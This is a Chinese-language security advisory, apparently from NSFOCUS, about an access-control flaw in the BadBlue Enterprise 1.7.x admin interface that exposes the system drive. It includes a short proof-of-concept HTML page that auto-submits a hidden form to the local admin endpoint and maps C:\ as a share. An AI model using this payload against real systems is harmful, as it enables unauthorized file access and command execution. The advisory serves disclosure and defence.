安全研究

安全漏洞
Working Resources BadBlue管理接口远程任意文件访问漏洞

发布日期:2002-07-20
更新日期:2002-07-26

受影响系统:
Working Resources Inc. BadBlue Enterprise Edition 1.7.3
Working Resources Inc. BadBlue Enterprise Edition 1.7.2
Working Resources Inc. BadBlue Enterprise Edition 1.7.1
Working Resources Inc. BadBlue Enterprise Edition 1.7
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000
描述:
BUGTRAQ  ID: 5276

BadBlue是一款由Woring Resources开发的P2P文件共享应用程序,可使用在Microsoft Windows操作系统下。

BadBlue没有充分控制对管理接口的访问,远程攻击者可以利用这个漏洞增加整个系统盘作为共享盘使用,以BadBlue进程权限执行任意命令和查看任意文件。

BadBlue对远程用户对管理接口的访问缺少正确的控制,远程攻击者可以构建包含恶意表单的WEB页,当Badblue系统浏览这个WEB页时,就会把"hd"虚拟ROOT指向任何系统盘,然后通过WEB接口就可以以BadBlue进程权限在系统中执行任意命令和查看任意文件。

<*来源:Matthew Murphy (mattmurphy@kc.rr.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0225.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Matthew Murphy (mattmurphy@kc.rr.com)提供了如下测试方法:

<HTML>
<HEAD>
<FORM ACTION=http://localhost/ext.dll METHOD=GET>
<INPUT TYPE=hidden NAME=MfcISAPICommand VALUE=LoadPage>
<INPUT TYPE=hidden NAME=page VALUE=dir.hts>
<INPUT TYPE=hidden NAME=a0 VALUE=add>
<INPUT TYPE=hidden NAME=a2 VALUE=hd>
<INPUT TYPE=hidden NAME=a1 VALUE=C:\>
</FORM>
</HEAD>
<BODY ONLOAD="document.forms(0).submit()" />
</HTML>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Working Resources Inc.
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.badblue.com/index.htm

浏览次数:2957
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障